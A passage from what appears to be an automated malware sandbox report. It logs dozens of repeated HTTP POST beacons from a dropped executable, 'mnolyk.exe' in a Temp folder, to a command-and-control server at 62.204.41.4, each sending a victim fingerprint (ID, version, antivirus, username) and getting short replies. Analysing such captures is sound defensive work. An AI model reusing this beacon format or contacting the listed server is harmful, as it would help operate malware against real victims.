                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:57.495574951 CET306INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            118192.168.2.44981362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:57.670732021 CET306OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:57.735996008 CET307INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            119192.168.2.44981462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:57.900701046 CET307OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:57.965436935 CET308INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            12192.168.2.44970762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:27.346126080 CET201OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:27.410761118 CET201INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            120192.168.2.44981562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:58.137634993 CET308OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:58.205291033 CET309INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            121192.168.2.44981662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:58.374845982 CET310OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:58.437958956 CET310INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            122192.168.2.44981762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:58.632622957 CET311OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:58.699338913 CET311INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            123192.168.2.44981862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:58.886130095 CET311OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:58.950388908 CET312INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            124192.168.2.44981962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:59.122996092 CET312OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:59.188100100 CET313INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            125192.168.2.44982062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:59.355921030 CET313OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:59.422553062 CET314INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            126192.168.2.44982162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:59.589817047 CET314OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:59.654450893 CET315INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            127192.168.2.44982262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:59.825963974 CET315OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:59.892210007 CET316INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            128192.168.2.44982362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:00.063009977 CET316OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:00.127099037 CET317INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            129192.168.2.44982462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:00.290374994 CET317OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:00.354929924 CET318INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            13192.168.2.44970862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:27.587074041 CET202OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:27.648657084 CET202INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            130192.168.2.44982562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:00.530244112 CET318OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:00.595655918 CET319INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            131192.168.2.44982662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:00.765609026 CET319OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:00.831090927 CET320INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            132192.168.2.44982762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:01.010258913 CET320OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:01.074604988 CET321INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            133192.168.2.44982862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:01.248596907 CET321OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:01.326994896 CET322INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            134192.168.2.44982962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:01.495961905 CET322OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:01.558684111 CET323INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            135192.168.2.44983062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:01.731970072 CET324OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:01.797064066 CET324INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            136192.168.2.44983162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:01.970314026 CET325OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
